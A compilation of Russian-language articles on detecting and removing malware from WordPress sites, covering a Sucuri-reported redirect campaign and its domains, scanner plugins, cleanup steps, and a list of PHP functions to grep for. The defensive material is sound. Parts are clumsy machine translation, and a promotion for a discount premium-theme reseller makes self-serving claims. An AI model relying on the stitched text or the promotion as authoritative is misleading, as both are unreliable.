9 плагинов для обнаружения вредоносного кода на WordPress-сайте


Оглавление (нажмите, чтобы открыть):

WordPress Hack перенаправляет посетителей на вредоносные сайты

Безопасность является одной из основных проблем для владельцев сайтов WordPress, и это правильно. Есть более 7,5 миллионов кибер-атак на WordPress сайты. Неудивительно, что WordPress с открытым исходным кодом делает его уязвимым для множества разнообразных атак. Но его ядро вполне безопасно, так как WordPress команда способна сохранить структурную целостность приложения. То же самое, однако, нельзя сказать про темы и плагины WordPress.

Вредоносная атакующая программа была недавно обнаружена Джоном Кастро Sucuri.

Исследователи компании Sucuri рассказали об обнаружeнии активной вредоносной кампании, направленнoй против сайтов на базе WordPress и Joomla. Злоумышленники взламывают ресурсы, работающие на базе популяpных CMS, через многочисленные уязвимости в распространенных плaгинах или эксплуатируют баги в самих CMS, пользуясь тем, что администраторы не обновляют ПО своевpеменно. Также специалисты пишут, что порой атакующие используют легитимные учетные данные, полученные из иных иcточников.

После взлома злоумышленники добавляют в файл header.php двенадцать строк прошедшего обфускaцию кода. Когда исследователи Sucuri расшифровали вредоносный код, выяснилось, что злоумышленники с 15% шансом перенаправляют посетителя зaраженного сайта на вредоносный адрес. Кроме того, в браузер жертвы добaвляется файл cookie, который гарантирует, что атака не будет применена к этому же пользoвателю в ближайший год.

В данной статье будет представлена подробная информация о нападении; а также советы, чтобы защитить ваш сайт от таких атак в будущем.

Как функционирует Malware Attack Works

Как уже упоминалось ранее, вредоносный код размещён в виде 10-12 строк кода в верхней части файла header.php активной темы WordPress. Код выглядит следующим образом:

Вредоносное содержимое перенаправляет посетителей на default7.com (это не обязательный пункт назначения редиректа) после их первого визита. Затем он устанавливает «896diC9OFnqeAcKGN7fW» куки для отслеживания постоянных посетителей в течение года, а также тесты для поисковых роботов поисковых систем.

Редиректы могут быть различными, default7 .com является только первым перенаправлением назначения. Посетители далее будут перенаправлены на следующие домены (в зависимости от IP-адреса и браузера):

  • test246 .com
  • test0 .com
  • distinctfestive .com
  • ableoccassion .com

Особенно интересным является поведение вредоносного ПО на Internet Explorer. Когда посетитель использует Internet Explorer, он перенаправляется на сайт, который обеспечивает вредоносный флэш или обновление Java.

Специалисты Sucuri сообщают, что раньше атакующие добавляли тот же код в footer.php, однако это пpиводило к возникновению ошибок и к конфликту с header.php, так что от данной тактики хакеры отказaлись.

Атаки на Joomla реализованы практически аналогично, только в этом случае инъекция вредонoсного кода осуществляет в файл administrator/includes/help.php. Эксперты отмечают, что сайты под управлением Joomla подвергаются заражению гораздо реже, кампания в оcновном нацелена на WordPress.

Бороться с проблемой специалиcты предлагают хотя бы простым отключением в файле wp-config.php возможности редактиpования файлов:

# Disable Theme Editing
define( ‘DISALLOW_FILE_EDIT’, true );

Еще одно интересное поведение происходит на Facebook. При совместном использовании зараженного сайта при ссылке на Facebook, вы можете увидеть на почту фрагмент с другого сайта — один из пяти переадресацией сайтов. Facebook будет по-прежнему перенаправлять пользователей на вредоносный сайт, даже после удаления вредоносных программ с вашего сайта. Это происходит потому, что кэш является общим. Вы можете сбросить кэш здесь .

Также в начале этой недели очень похожую схему атак разоблaчили исследователи компании eZanga. Они обнаружили вредоноса MosQUito, кoторый так же атакует ресурсы, работающие на базе WordPress или Joomla. Малварь подменяет все упоминaния минифицированной версии библиотеки jQuery.min.js на путь к вредоносному файлу jQuery.min.php, котоpый является частью MosQUito. Данный файл следит за входящим трафиком и случайным образом редиректит некотоpых посетителей сайта на сомнительные ресурсы, которые находятся под контролем злоумышленников.

Вы можете быть удивлены, узнав, что этот вид инфекции является довольно распространенным явлением, когда хакеры получают доступ к интерфейсу администратора WordPress. С правильными учетными данными, они способны (довольно легко) редактировать файл темы.

Почему премиум темы и плагины WordPress стоит скачивать только из надёжных источников. Как проверить тему или плагин на вирусы?

В этой статье мы подробно расскажем почему премиум темы и плагины для WordPress стоит скачивать только из надёжных источников (как, например, проект WPNULL.ORG) и с помощью каких инструментов вы сможете проверить тему или плагин на наличие вирусов или вредоносного кода.

1.1 В чём отличие бесплатных и премиум WordPress продуктов?

Бесплатные WordPress темы и плагины – это, как правило, некоммерческие продукты, созданные энтузиастами-любителями. Они редко обновляются, имеют очень слабую техническую поддержку или не имеют её вовсе, авторы не дают вам никаких обязательств или гарантий.

Премиум WordPress темы и плагины – это коммерческие продукты, созданные с целью их дальнейшей продажи, а также продажи сопутствующих услуг. Такие продукты регулярно обновляются, имеют широкие функциональные возможности, техническую поддержку и гарантии разработчиков.

1.2 Почему некоторые сайты в интернете предоставляют премиум темы и плагины бесплатно?

Очень часто на просторах интернета можно встретить сайты, на которых вам предлагают бесплатно скачать премиум (коммерческие) WordPress продукты. Посещая такой сайт в интернете, вы можете легко сделать следующие выводы:

  • Темы и плагины, которые раздаются на сайте бесплатно, не были куплены владельцами ресурса официально. Обычно цена премиум продукта находится в пределах $20-$100. Маловероятно, что человек, который покупает продукт за такую стоимость будет делиться им со всеми совершенно бесплатно, а, следовательно, файлы были скачаны из неофициальных источников
  • Предоставляя коммерческие продукты бесплатно, такие сайты пытаются заработать деньги косвенными методами, внедряя в файлы вирусы и вредоносный код с целью последующего взлома чужих сайтов, кражи личных данных, рассылки спама, фишинга и прочего

1.3 Какие разновидности вирусов и вредоносного кода бывают и какие бывают последствия?

Давайте разберём, какие угрозы могут быть внутри файла, скачанного из ненадёжного источника.

Вирусы (черви, трояны, руткиты) – вредоносное программное обеспечение, созданное с целью нарушения нормальной работы компьютера, скрытого администрирования, кражи личных данных и пр.

Сейчас сложно найти человека, у которого не установлен файловый антивирус (например, Kaspersky Internet Security, Nod32, Dr.Web, Malwarebytes AntiMalware). Ещё сложнее представить человека, который запускает .exe файлы или отсылает SMS сообщения на незнакомые номера в попытке распаковать архив, скачанный с сайта, напичканного рекламными баннерами и всплывающими окнами. Поэтому угроза вирусов в файлах отходит на второй план.

Вредоносный код – это скрипты, внедряемые в код PHP или JavaScript, созданные с целью взлома сайтов, кражи личных данных, спам-рассылки, фишинга, чёрного SEO.

Если с вирусами всё понятно, то здесь ситуация намного сложнее – вредоносный код не является вирусом и, соответственно, не обнаруживается десктопными файловыми антивирусами, более того, на сегодняшний день в мире нет ни одного инструмента который со 100% вероятностью идентифицировал код как вредоносный.

Рассмотрим основные разновидности вредоносного кода:

  • Спам-боты – вредоносный код, внедряемый в скрипты с целью рассылки спама через ваш веб-сайт (веб-сервер).
  • Бэкдоры – вредоносный код, который позволяет злоумышленнику получить полный доступ к сайту с целью последующего дефейса, взлома севрера и т.п.
  • XSS-скрипты – вредоносный код, внедряемый, как правило, с целью кражи личных данных посетителей вашего веб-сайта.
  • Эксплойты – вредоносный код, позволяющий получить привилегированные права доступа к вашему веб-серверу через известные уязвимости в операционной системе и прикладном ПО.
  • Редиректы – вредоносный код, который будет перенаправлять посетителей вашего веб-сайта на другой сайт без вашего ведома. Бывают различные виды редиректов, например, перенаправляться будут только пользователи, которые зашли на ваш сайт с мобильных устройств.
  • Фишинговые скрипты – вредоносный код, который создаёт мошеннические страницы (копии известных сайтов), используя ваш веб-сервер.
  • Рекламные скрипты – вредоносный код, который будет добавлять на страницы вашего сайта обратные ссылки на чужие веб-сайты.

1.4 Как проверить тему или плагин WordPress на наличие вредоносного кода?

В интернете довольно много статей, посвящённых инструментам проверки файлов на наличие вредоносного кода. Мы приведём здесь лишь самые популярные инструменты, которые мы сами используем в своей работе при проверке на вредоносный код и анализе на безопасность используемых скриптов.

Онлайн-сервисы
VirusTotal (https://virustotal.com)
ThemeCheck (http://themecheck.org)

PHP-антивирусы
Aibolit (https://www.revisium.com/ai)
Яндекс Манул

Плагины для WordPress
TAC (https://ru.wordpress.org/plugins/tac)
Antivirus (https://ru.wordpress.org/plugins/antivirus/)
Exploit Scanner (https://ru.wordpress.org/plugins/exploit-scanner)
Acunetix WP Security (https://ru.wordpress.org/plugins/wp-security-scan)
Sucuri Security (https://ru.wordpress.org/plugins/sucuri-scanner)
Wordfence Security (https://ru.wordpress.org/plugins/wordfence)
GOTMLS (https://wordpress.org/plugins/gotmls)
WP Antivirus Site Protection (https://ru.wordpress.org/plugins/wp-antivirus-site-protection)
Quttera Web Malware Scanner (https://ru.wordpress.org/plugins/quttera-web-malware-scanner)

Следует помнить, что использование любого инструмента не даст вам никаких гарантий при проверке темы или плагина на вредоносный код, и, если вы не уверены в надёжности источника, вам следует обратиться за помощью к профессионалам.

1.5 Что такое ложное срабатывание (false positive)

В последнее время многие пользователи довольно часто используют популярные онлайн-сервисы (например, virustotal.com) для проверки файлов на наличие вредоносного кода.

Сервис работает следующим образом: получает от вас файл, проверяет этот файл порядка 55 популярными и не очень антивирусами, и, в случае обнаружения хотя бы одним антивирусом, выводит информацию о том, что внутри файла присутствует вредоносный код.

Проблема в том, что в списке антивирусов могут присутствовать, например, китайские антивирусные решения, такие как Bkav, Jiangmin, Rising, Cyren. Такие антивирусы зачастую проверяют код просто на наличие конструкций вида eval, base64_encode/decode и подобных. Хотя наличие таких конструкций в php-коде вовсе не означает, что код вредоносный, и многие разработчики используют данные конструкции в своих целях (упаковка/распаковка данных, кастомные шрифты в css и другое).

По этой причине китайские антивирусы часто ругаются на абсолютно чистые файлы, скачанные напрямую у разработчиков. Это называется ложное срабатывание (на английском языке термин False Positive). Обычно на том же virustotal при проверке файлов показатель выявления при ложном срабатывании 1-2 (китайских) антивируса из 55. В случае, если показатель выявления выше – можно с большой долей вероятности говорить о том, что в проверяемом файле присутствует вредоносный код.

Наша поддержка иногда получает обратную связь о том, что virustotal ругается на чистые файлы. Никогда не нужно забывать о ложном срабатывании, однако в вопросах безопасности стоит оставаться бдительным и не использовать файлы, если вы не уверены в надёжности источника. Запомните! 100% инструмента проверки на вредоносный код не существует!

1.6 Что делать если хочется использовать премиум тему или плагин, но позволить себе купить их вы не можете

Ответ очевиден – найти надёжный ресурс в интернете, который предлагает купить премиум продукты для WordPress по более низкой стоимости.

Мы предлагаем вам ознакомиться с коллекцией премиум тем и плагинов на нашем проекте WPNULL.ORG. Наш сайт предлагает своим клиентам 100% оригинальные чистые файлы, скачанные напрямую с сайтов разработчиков, без вшитой рекламы, вирусов или вредоносного кода.

Мы покупаем премиум продукты оптом и при продаже не включаем в их стоимость техническую поддержку, поэтому наши цены значительно ниже, чем у разработчиков.

Вы также получите от нас консультацию или помощь, если у вас возникнут проблемы с установкой или настройкой продукта. Мы работаем на рынке премиум тем и плагинов WordPress уже 2 года, более 5000 клиентов доверяют нам и покупают продукты на WPNULL. Присоединяйтесь!

5 WordPress плагины для борьбы с вредоносным кодом в вашем блоге

Divi: самая простая тема WordPress для использования

Divi: Лучшая тема WordPress всех времен!

Более Загрузка 600.000, Divi — самая популярная тема WordPress в мире. Он является полным, простым в использовании и поставляется с более чем бесплатными шаблонами 62. [Рекомендуется]

WordPress — главная цель для хакеров по всему миру. Есть несколько причин, по которым они хотели бы взломать блог WordPress.

Кроме того, WordPress часто обновляется и появляются новые плагины WordPress (а также темы). С таким большим количеством взломать, хакеры не могут получить достаточно. Иногда опасность исходит от тем и плагинов, содержащих вредоносный код (Узнайте, почему WordPress.org является почти святым местом).

Каковы бы ни были причины, вы должны понимать, что анализ вредоносного кода в вашем блоге не является чем-то легким, но это легко сделать с помощью множества доступных инструментов.

В этом списке я предложу вам лучшие плагины для WordPress, которые можно использовать для изменения вредоносного кода.

1. Zxeion

Zxeion — это мощный плагин для WordPress, который повышает безопасность вашего сайта. Этот плагин содержит набор инструментов защиты и безопасности, которые защитят ваш сайт от возможных атак.

Его система защиты в режиме реального времени поможет вам определить угрозы для вашего сайта и заблокировать их, без необходимости что-либо делать. Его функции: защита в режиме реального времени, отличная поддержка клиентов, регулярные обновления, блокировка IP-адресов, отличная документация, современный и профессиональный интерфейс, специализированная поддержка и многое другое

Вы ищете лучшие темы и плагины WordPress?

Загрузите лучшие плагины и темы WordPress на Envato и легко создайте свой сайт. Уже больше, чем 49.720.000. [ЭКСКЛЮЗИВ]

2. Smart Tools Security

Smart Security Tools — очень эффективный плагин WordPress для повышения безопасности вашего сайта. Он имеет набор настроек и инструментов для дополнительной защиты, связанных с советником по безопасности, которые могут помочь вам определить, что нужно сделать.

Плагин интегрирует антивирусы, такие как Вирус Всего et Succuri кто отвечает за сканирование и обнаружение вредоносных программ на вашем сайте. У вас также есть журнал безопасности, из которого вы можете запретить определенные IP-адреса.

Он также имеет большое количество расширений премиум-класса для расширения панели своих функций.

3. WP сканер

WP Scanner это ежедневная служба автоматического сканирования вредоносных программ. Платформа безопасности также предлагает сервис удаления вредоносных программ в один клик и постоянную защиту веб-сайтов | Нет ложных срабатываний

Его функции включают в себя: раннее обнаружение вредоносных программ, обнаружение трудно обнаруживаемых вредоносных программ, автоматическую очистку одним нажатием, сканирование вредоносных программ, которое не перегружает ваш сервер, защита входа в систему, брандмауэр Веб-приложение, безопасное и полное резервное копирование вашего веб-сайта, обнаружение вредоносного ПО в режиме реального времени, выборочное сканирование ключевых слов, подробные отчеты и многое другое.

4. WP-SpamShield

WP-SpamShield — это мощный плагин для защиты от спама в WordPress, он работает в фоновом режиме и не содержит капчи на вашем сайте WordPress.

Легко создайте свой сайт с Elementor

Elementor позволяет легко создать любой дизайн сайта с профессиональным дизайном. Прекратите платить дорого за то, что вы можете сделать сами. [Free]

Он защищает вашу форму обратной связи, а также вашу регистрационную форму и все другие элементы, которые могут получать спам. Вначале этот плагин был бесплатным, но сегодня с миллионами скачиваний 4 он стал одним из самых популярных плагинов WordPress для борьбы со спамом.

Ваш сайт будет намного безопаснее, когда вы начнете использовать этот плагин. Как уже упоминалось, он ничего не добавляет, например, раздражающая капча или проблема защиты от спама, но он работает в фоновом режиме, чтобы защитить ваш сайт 24 / 7.

5. Безопасность Ninja PRO

Security Ninja PRO — еще один премиальный плагин для WordPress, который поможет вам полностью улучшить безопасность вашего сайта. Он предлагает множество опций и функций, которые позволят вам взять под контроль все аспекты безопасности вашего сайта.

Его функции: больше доступных тестов безопасности 40, полное сканирование вашего веб-сайта, чтобы обнаружить все уязвимости и недостатки безопасности, интеграция сканера вредоносных программ, резервное копирование действий вашего веб-сайта, планирование различных сканов и многое другое

Легко создайте свой интернет-магазин

Загрузите бесплатные WooCommerce, лучшие плагины для электронной коммерции, чтобы продавать свои физические и цифровые продукты в WordPress. [FREE]


9 плагинов для обнаружения вредоносного кода на WordPress-сайте

Если ваш сайт взломали — не паникуйте.

В этой статье вы узнаете 2 способа вылечить сайт от вредоносного кода, бэкдоров и спама вручную, и 1 способ с помощью плагина.

В первом способе вы Экспортируете базу данных и несколько файлов. После этого вы переустановите Вордпресс, Импортируете базу данных обратно и импортируете несколько настроек из сохраненных файлов.

Во втором способе вы удалите часть файлов и попробуете найти внедренный код при помощи команд в SSH терминале.

В третьем способе вы установите плагин.

Убедитесь, что сайт взломан

Если вы думаете, что сайт взломан, убедитесь, что это действительно так. Иногда сайт может вести себя странно или вы можете думать, что сайт взломали.

Ваш сайт взломан, если:

  • Вы видите появляющийся спам на вашем сайте в хедере или футере, который рекламирует казино, кошельки, нелегальные сервисы и так далее. Такое объявление может быть незаметным для посетителей, но заметным для поисковых систем, например, темный текст на темном фоне.
  • Вы делаете запрос site:ваш-сайт.ru в Яндексе или Гугле, и видите на страницах сайта контент, который вы не добавляли.
  • Ваши посетители говорят вам, что их перенаправляет на другие сайты. Эти редиректы могут быть настроены так, что они не работают с администратором сайта, но работают для обычных пользователей и видны поисковым системам.
  • Вы получили сообщение от хостинг провайдера о том, что ваш сайт делает что-то вредоносное или спамит. Например, что ваш сайт рассылает спам, или в интернет-спаме присутствует ссылка на ваш сайт. Хакеры рассылают спам, в том числе с зараженных сайтов, и используют зараженные сайты для перенаправления пользователей на свои сайты. Они так делают, потому что хотят избежать спам-фильтров, чтобы их сайты не попали под санкции поисковых систем. Когда зараженный сайт попадает в спам-фильтры, хакеры оставляют его и пользуются другими.
  • Другие признаки в чек-листе по взлому сайта

Сделайте бэкап

После того, как вы убедились, что сайт взломан, сделайте бэкап всего сайта с помощью плагина, бэкап приложения на хостинге или по FTP.

Некоторые хостинг провайдеры могут удалить сайт, если вы скажете им, что сайт взломан, или если хостинг провайдер сам определит это. Владельцы хостинга могут удалить сайт, чтобы не заразились другие сайты.

Мастер Йода рекомендует:  Зачем программисту нужен ментор и где его найти

Также сделайте бэкап базы данных. Если что-то пойдет не так, вы всегда можете вернуться ко взломанной версии сайта, и начать все сначала.

Если ваши логи событий хранятся не в папке сайта, то скопируйте логи, так как обычно они хранятся на хостинге несколько дней, после чего автоматически удаляются.

Что можно безопасно удалить с любого взломанного сайта

  • Обычно можно удалить все содержимое папки wp-content/plugins/ . Вы не потеряете никакие данные и это не разрушит сайт. Позже Вордпресс определит, что вы удалили плагины, и отключит их. Не удаляйте только отдельные файлы, удаляйте папки с плагинами целиком. Некоторые плагины создают свои папки и файлы не только в папке /plugins , но и в других. Например, W3TC удаляется так. Некоторые файлы кеша W3TC определяются некоторыми сканерами как подозрительный или вредоносный код. Удалите все папки и файлы плагинов, чтобы не было ложных срабатываний.
  • Оставьте только одну тему в папке wp-content/themes/ , все остальные папки с темами можно удалить. Если вы пользуетесь дочерней темой, то оставьте 2 папки, — с родительской и с дочерней темой.
  • В папки wp-admin и wp-includes очень редко добавляются новые файлы. Если вы видите в них что-то новое, скорее всего, это добавил хакер. Файлы Вордпресс.
  • Удалите старые копии или бэкапы сайта из подпапок сайта. Обычно что-нибудь вроде /old или /backup . Хакер мог попасть в старую версию сайта, и оттуда проникнуть в основную версию сайта. Если ваш сайт взломали, проверьте эти папки на наличие вредоносного ПО, часто старые версии сайта заражены вирусами.

Как очистить Вордпресс сайт от заражения. Способ 1

  1. Сделайте полный бэкап сайта и базы данных, и сохраните их на компьютер.
  2. Скачайте на компьютер файл wp-config.phpиз корневой папки сайта, папку /wp-content/uploads и папку с активной темой. Перед копированием темы обновите ее до последней версии. Если вы пользуетесь дочерней темой, то скопируйте обе папки.
  3. Полностью удалите сайт и базу данных с сервера.
  4. Установите свежую копию Вордпресс, используйте новые сложные логин и пароль.
  5. Перенесите настройки связи с базой данных из сохраненного файла wp-config.php в новый из этой части файла:

Как удалить вредоносный код и вылечить сайт. Способ 2

Если у вас есть SSH доступ к серверу, вы можете использовать эти команды, чтобы проверить, какие файлы изменялись за последние X дней. Этот запрос покажет все измененные файлы в запрошенном интервале времени во всех папках и подпапках сайта (чтобы узнать, какие это папки, наберите pwd в SSH терминале):

Если вы хотите найти измененные файлы в определенной папке, используйте этот запрос:

Замените /путь/к/вашему/сайту/папка/ на путь к вашей папке.

Если вы хотите изменить интервал до 10 дней, сделайте такой запрос:

Не забудьте заменить /путь/к/вашему/сайту/папка/ на путь к нужной папке.

Сделайте такой поиск, начните с 2-х дней и постепенно увеличивайте количество дней, пока не увидите изменения в файлах. Не забывайте, что обновления ПО — тоже изменения в файлах. После того, как вы нашли зараженный файл, его можно вылечить или заменить на оригинальный. Это очень простой и эффективный способ найти зараженные файлы, который используется всеми сервисами по лечению сайтов.

Еще одна полезная команда в SSH — «grep». Чтобы найти файл, который содержит какое-нибудь сочетание, например, «base64», которое часто используется хакерами, используйте эту команду:

Эта команда покажет список файлов, в которых встречается сочетание base64 .
Вы можете убрать «l» из запроса, чтобы увидеть содержание файлов, в которых встречается это сочетание.

Хакеры часто используют эти функции:

  • base64
  • str_rot13
  • gzuncompress
  • eval
  • exec
  • create_function
  • system
  • assert
  • stripslashes
  • preg_replace (/e/)
  • move_uploaded_file

Эти функции могут использоваться и в оригинальных файлах тем или плагинов, но в большинстве случаев это хак. Перед тем, как что-нибудь удалить, убедитесь, что вы не удаляете здоровый код или файл.

Более аккуратный запрос может быть таким:

Результат этого запроса показывает номера строк, в которых содержится сочетание «base64_decode», в тех файлах, которые заканчиваются на .php.

Попробуйте использовать команду grep в комбинации с командой find . Вам нужно найти файлы, которые были недавно изменены, выяснить, что было изменено, и если вы нашли какое-то повторяющееся сочетание, например, «base64_decode» или «hacker was here», с помощью команды grep попробуйте найти это сочетание в других файлах:

Эта команда покажет все файлы, в которых встречается фраза hacker was here .

Хакеры часто внедряют код в папку /uploads . Этот код поможет вам найти все файлы в папке uploads, которые не являются изображениями. Результат сохраняется в файле “uploads-not-pictures.log” в текущей папке.

Использование запросов find и grep поможет вам очистить сайт от заразы.

Как найти вредоносный код и вылечить сайт с помощью плагина. Способ 3

Зайдите в Scan Settings, Зарегистрируйтесь в правом окне Updates & Registrations и нажмите Run Complete Scan.

Сервисы, на которых вы можете проверить сайт на наличие вредоносного ПО

  • Unmask Parasites — довольно простой сервис для проверки сайта. Первый шаг, чтобы определить, был ли сайт взломан.
  • Sucuri Site Check — хороший сервис для поиска заражений на сайте. Кроме сканера показывает, внесен ли сайт в списки вредоносных сайтов. На данный момент 9 списков.
  • Norton Safe Web – сканер сайта от Norton.
  • Quttera – сканирует сайт на наличие вредоносного ПО.
  • 2ip — проверяет на вирусы и включение в черные списки Яндекса и Гугла.
  • VirusTotal – крутейший сервис для сканирования сайтов, использует более 50 разных сканеров — Касперского, Dr.Web, ESET, Yandex Safebrowsing и других. Можно просканировать сайт, IP адрес или файл.
  • Web Inspector – еще один хороший сервис, проверяет сайт на наличие червей, троянов, бэкдоров, вирусов, фишинга, вредоносного и подозрительного ПО и так далее. В течение пары минут генерирует довольно детальный отчет.
  • Malware Removal – сканирует сайт на наличие вредоносного ПО, вирусов, внедренных скриптов и так далее.
  • Scan My Server – сканирует сайт на вредоносный софт, SQL внедрения, XSS и так далее. Для использования требуется бесплатная регистрация. Довольно детальные отчеты приходят на е-мейл раз в неделю.

Что делать с зараженными файлами

В зависимости от того, что вы нашли, вы можете удалить файл целиком или только ту часть, которую добавил хакер.

  • Если вы нашли файл бэкдора, в котором находится только вредоносный скрипт — удалите весь файл.
  • Вы нашли вредоносный код в файле Вордпресс, темы или плагина — удалите весь файл, и замените на оригинальный с официальной страницы.
  • Вы нашли вредоносный код в файле, который вы или кто-то создал вручную — удалите вредоносный код и сохраните файл.
  • Возможно, у вас в бэкапе есть незараженная версия сайта, вы можете восстановить сайт из старой версии. После восстановления обновите Вордпресс, плагины и тему, смените пароль и установите плагин безопасности.
  • Если ничего не помогло — обратитесь к профессионалам в платный сервис.

После очистки сайта Гугл Хром продолжает показывать предупреждение о том, что сайт опасен и содержит вредоносное ПО. Что делать?

Вам нужно удалить свой сайт из списка зараженных сайтов Гугл.

  1. Зайдите в Инструменты вебмастера Гугл
  2. Добавьте свой сайт, если вы его еще не добавили
  3. Подтвердите владение сайтом
  4. На главной странице вашего аккаунта Инструментов вебмастера Гугл выберите ваш сайт
  5. Кликните Проблемы безопасности
  6. Нажмите Запросить проверку

Посетители сайта получают предупреждения от файрволов и антивирусов. Что делать?

Аналогично со списком зараженных сайтов Гугл, нужно удалить сайт из списков всех антивирусов: Касперского, ESET32, Avira и так далее. Зайдите на сайт каждого производителя и найдите инструкции по удалению своего сайта из списка опасных сайтов. Обычно это называется whitelisting. Наберите в поисковике eset whitelist website, avira site removal, mcafee false positive, это поможет вам найти нужную страницу на этих сайтах, чтобы исключить свой сайт из списка сайтов, содержащих вредоносное ПО.

Как узнать, что мой сайт находится в списке опасных сайтов, содержащих вредоносное ПО?

Пройдите по этой ссылке, замените ваш-сайт.ru на ваш адрес:

Там же вы можете проверить субдомены вашего сайта, если они есть. На этой странице вы найдете детальную информацию о вашем сайте, находится ли он в списках malware или phishing сайтов, и что делать, если содержится.

Что делать, чтобы сайт не заразился снова?

  • Регулярно обновляйте версию Вордпресс, тем и плагинов по мере выхода новых версий. Автообновление Вордпресс.
  • Используйте сложные логины и пароли. Рекомендация для пароля: пароль должен быть не менее 12 символов, содержать заглавные и строчные буквы, цифры и символы.
  • Выбирайте темы и плагины от проверенных авторов.
  • Используйте надежный хостинг. Обзор хостинга Бегет.
  • Установите плагин безопасности. 7 Лучших плагинов защиты Вордпресс.
  • Настройте автоматический бэкап всех файлов и базы данных. Бэкап Вордпресс.
  • Удалите все старые версии сайта с сервера.
  • Читайте Безопасность Вордпресс. Подробное описание.

Читайте также:

Надеюсь, статья была полезна. Оставляйте комментарии.

Как найти и удалить вредоносный код с Web-сайта, разработанного на платформе WordPress

Платформа WordPress завоевывает все большую популярность среди блоггеров благодаря удобному и быстрому процессу создания и управления Web-сайтом. Отдельно следует отметить огромное количество бесплатных плагинов и виджетов, доступных для данной системы. На базе этой платформы можно построить не только обычный блог, но и целый Интернет-магазин, новостной портал или online-кинотеатр.

Но большинство Web-сайтов, построенных на базе этой бесплатной CMS, обладают определёнными уязвимостями в системе безопасности. Разработчики WordPress, конечно, стараются оперативно закрывать их и выпускают обновления не только для самой платформы, но и для стандартных тем и плагинов. Тем не менее, защититься от взлома удаётся не всегда.

Опираясь на последние исследования, представленные на официальном сайте платформы, можно составить четкое представление о механизмах заражения, так как, сайт, построенный на WordPress, может быть взломан в основном через сторонние плагины или измененные темы оформления.

В случае взлома большинство неопытных Web-администраторов, как правило, начинают паниковать и совершать непоправимые ошибки, которые могут привести к потере всей базы данных или файлов. В этой статье мы постараемся рассказать, как «вылечить» Web-сайт и вернуть его к тому состоянию, в котором он находился до взлома.

Резервное копирование

Существуют два способа резервного копирования Web-сайта: копирование исходных файлов сайта и копирование базы данных (БД). Для WordPress существует стандартный инструмент для резервного копирования, но он создаёт только копию базы данных.

Для резервного копирования файлов можно воспользоваться сторонними плагинами или применить полное автоматическое резервное копирование, инструменты для которого обычно присутствуют на хостинге. Настроить выполнение полного резервного копирования по определённому расписанию не очень сложно, зато впоследствии этот процесс может сберечь нервы администратора и сэкономить значительное количество времени. Если вы не можете самостоятельно настроить механизм полного резервного копирования данных, то настоятельно рекомендуется обратиться к хостеру для решения этого важного вопроса. Начинающим Web-администраторам можно посоветовать регулярно выполнять резервное копирование вручную.

Если копия сайта и БД будет храниться на флеш-накопителе, то это стопроцентная гарантия того, что вы с легкостью сможете восстановить Web-сайт в любой момент.


Восстановление или лечение

Практически все Web-сайты предназначены для принесения дохода своему владельцу. Поэтому обязательным требованием для Web-сайта является работа в режиме 24х7 (24 часа в сутки, 7 дней в неделю) с минимальными периодами отключения для проведения технических работ.

Поэтому в случае заражения Web-сайта администраторы стремятся как можно быстрее восстановить информацию из резервных копий. Но так как проблема никуда не уходит, и Web-сайт по-прежнему имеет «брешь» в системе безопасности, то повторный взлом произойдёт очень скоро и не займет у злоумышленника много времени.

Подобная ситуация будет повторяться снова и снова, особенно это касается популярных Web-сайтов, поэтому правильным решением проблемы будет срочное закрытие уязвимости. Если же ограничиться только постоянным восстановлением Web-сайта, то можно потерять все показатели в поисковых системах и даже попасть под их фильтр из-за распространения вредоносного ПО.

Как определить наличие вредоносного ПО

Как узнать, был ли взломан Web-сайт, и определить первые симптомы заражения? На самом деле, это очень просто, провал статистики посещаемости, переадресация на незнакомые Web-сайты, чрезмерное потребление трафика – всё это признаки заражения и наличия вредоносных ссылок, понижающих рейтинг ресурса. Не говоря уже о явных ситуациях, когда в поисковой выдаче Яндекс или Google появляется отметка о «заражённости» вашего Web-сайта.

При посещении зараженного сайта в Web-браузерах Opera, Chrome или Firefox будет отображаться окно предупреждения об инфицированном ресурсе, так как данные браузеры имеют свои базы для определения инфицированных сайтов. В конце концов, локальный антивирус может определить, что Web-сайт был заражен, когда при попытке перехода между внутренними страницами, вы увидите соответствующее сообщение. Может оказаться, что Web-сайт был взломан и используется для рассылки рекламного спама. Об этом можно узнать, когда на адрес вашего хостера начнут приходить уведомления о массовой рассылке спама.

Как надо поступать в подобных ситуациях? Для начала следует определить, где скрывается вирус или рекламная ссылка, и каким образом они попали на сайт, так как могут быть «заражены» темы оформления, база данных или ядро сайта.

Самый простой, но и самый долгий способ поиска вируса – это попытаться отследить даты изменения файлов. Допустим, основная масса файлов в важнейших каталогах (wp-includes, wp-admin и др.) имеют одну и ту же дату создания, но есть один или два файла с более поздними датами создания. Отметьте эти файлы и сравните их с файлами из дистрибутива WordPress. Также можно сравнить файлы по размеру в программе Total Commander. Остаётся только сравнить содержимое подозрительных файлов и выяснить, для чего предназначены найденные лишние фрагменты кода.

Как проверить обрабатываемый HTML-код

Возможно, по какой-то причине у вас не получилось обнаружить проблему описанным выше методом. Тогда можно попытаться найти источник заражения другим способом.

Потребуется открыть «заражённый» Web-сайт в браузере (предпочтительнее в Opera или Firefox) и выбрать в контекстном меню пункт «Показать исходный код сайта«. Если вы знаете HTML, то наверняка сможете заметить подозрительные строки. Это могут быть незнакомые ссылки на сайты, куски «сжатого» или зашифрованного (способом base64) кода, также это может быть неизвестный фрагмент Javascript, который наверняка тоже будет зашифрован. Определить его можно по включенной в код фрагмента команде eval . Обычно это означает, что кто-то пытался скрыть истинный код Javascript, что должно вызывать определенные подозрения. На рисунке 1 представлен пример подозрительного кода.

Рис. 1 Фрагмент подозрительного HTML-кода

Кстати, если на Web-сайте используется бесплатный шаблон стороннего производителя, то таким методом можно найти рекламные ссылки, встраиваемые авторами шаблонов. Обычно подобные ссылки безобидны, т.е. не относятся к вирусам. Тем не менее, они могут негативно влиять на показатели Web-сайта в поисковых системах и перенаправлять трафик на сторонний ресурс.

Когда вредоносный код на страницах сайта не удается обнаружить способами, описанными выше, то можно воспользоваться сторонними online-инструментами. Например, можно установить плагин WordPress Exploit Scanner, который будет регулярно проверять Web-сайт и выявлять вредоносное ПО. Плагин представляет подробный отчет и выделяет строки, которые впоследствии следует удалить.

Кроме того, можно просканировать Web-сайт online-сканнером Sucuri SiteCheck – эта услуга абсолютно бесплатна, а за определенную плату можно заказать полное лечение ресурса.

Как проверить плагины и темы на наличие вредоносного кода

Что касается тем оформления, то в них можно отследить вредоносный код вручную или установить плагин TAC, который работает с файлами тем, проверяя их на посторонние ссылки и вирусный код. С помощью этого плагина можно проверить как уже установленные темы, так и новые.

